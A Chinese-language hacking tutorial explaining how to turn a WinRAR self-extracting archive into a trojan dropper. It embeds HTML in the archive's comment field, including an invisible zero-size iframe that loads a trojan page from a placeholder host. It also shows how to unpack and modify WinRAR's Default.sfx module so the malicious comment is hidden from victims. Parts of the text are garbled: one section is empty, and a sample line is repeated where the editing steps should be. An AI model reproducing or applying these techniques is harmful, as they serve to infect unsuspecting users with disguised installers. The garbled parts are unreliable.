一、WinRAR與木馬結合的優點
大家都知道WinRAR軟件可以制作EXE自解壓文件,以方便沒有安裝WinRAR軟件的用戶。WinRAR制作的自解壓文件非常常見,而且不少軟件也開始采用它來制作安裝程序。用WinRAR制作自解壓文件時,還可以對自解壓界面進行自定義美化,在自解壓時顯示任意的文件或圖片。我們可以通過對WinRAR自解壓文件界面的再定義,從而欺騙對方在解壓前執行網頁木馬。
二、簡單測試
這里我們先來測試一下,在文本輸入區中,輸入如下代碼:
<script>alert('nethack')</script>
這段代碼常常被用來檢測跨站漏洞,如果存在漏洞的話,那么在網頁中會彈出一個文字提示對話框。點擊“確定”按鈕,返回自解壓對話框,再點擊“確定”按鈕,即可在壓縮包文件路徑下,生成一個同名的后綴為.exe的自解壓文件。現在,我們來雙擊這個自解壓文件,看看前面的跨站檢測代碼是否執行?自解壓文件打開后,同時彈出了剛才設置的文字提示對話框,說明網頁代碼執行了。
由此可見,WinRAR的自解壓文件界面存在著跨站掛馬的漏洞,我們完全可以修改剛才的測試代碼,讓自解壓文件在打開時顯示任意的網頁,當然也可以顯示木馬網頁,從而實現利用WinRAR自解壓文件掛網頁木馬的攻擊目的!
三、自解壓掛網頁木馬
現在,我們來制作一個具有掛馬攻擊性的WinRAR自解壓文件。首先,準備一個網頁木馬,并將其上傳到某個網站空間中去。這里假設網頁木馬鏈接地址為“http://www.XXX.com/01.htm”。然后制作一個自解壓文件,方法與前面相同,但是在寫入文本框中,我們需要輸入如下代碼:
<iframe width=0 height=0 src="http://www.XXX.com/01.htm"></iframe>
這段代碼表示顯示一個長寬都為0網頁象素,也就是不可見的頁面框架,顯示的網頁內容為指定的木馬網頁。確定后即可制作成功一個掛馬攻擊的WinRAR自解壓文件了。但是這里為了便于抓圖顯示攻擊效果,我們將掛馬語句改為了:
<iframe width=800 height=800 src="http://www.baidu.com"></iframe>
表示顯示一個長寬為300的頁面框架,顯示的網頁內容為百度首頁。雙擊打開我們加入了掛馬代碼的WinRAR自解壓文件時,可以在自解壓界面窗口中看到顯示了百度網頁。由此可見掛成功!只要將代碼換為真實的掛馬代碼,那么在WinRAR自解壓界面中,就會顯示空白頁面,同時隱藏的打開木馬網頁,根本察覺不到任何攻擊的癥狀!
四、掛馬自解壓包的不足
五、木馬保護更強悍
那么,如何才能讓隱藏注釋信息,讓掛馬攻擊的自解壓包文件更完美呢?其實,自解壓文件的“注釋”信息,來源于WinRAR中的“Deault.sfx”自解壓模塊。我們完全可以修改此模塊,讓自解壓文件不顯示“注釋”信息。
在WinRAR安裝目錄下,可以找到模塊文件“Deault.sfx”。在修改前,可用Peid查殼,發現文件加了UPX殼,用UPX Shell對其脫殼即可。
<iframe width=800 height=800 src="http://www.baidu.com"></iframe>
修改完畢后,關閉eXeScope,保存更新“Deault.sfx”文件。然后直接創建一個WinRAR自解壓文件,無需在其中添加掛馬代碼了,此時創建和自解壓文件中自動顯示了掛馬網頁(如圖11)。但是在文件屬性中,卻根本看不到“注釋”選項頁,這樣就實現了隱藏“注釋”信息。如果我們掛馬框架長寬為0的話,在自解壓界面中顯示的是“單擊安裝按鈕開始解壓……”之類的默認信息,也不會出現前面的空白頁。
這樣,一個極度完美的WinRAR自解壓木馬便制作成功了!你能找出它與普通自解壓文件有什么不同嗎?
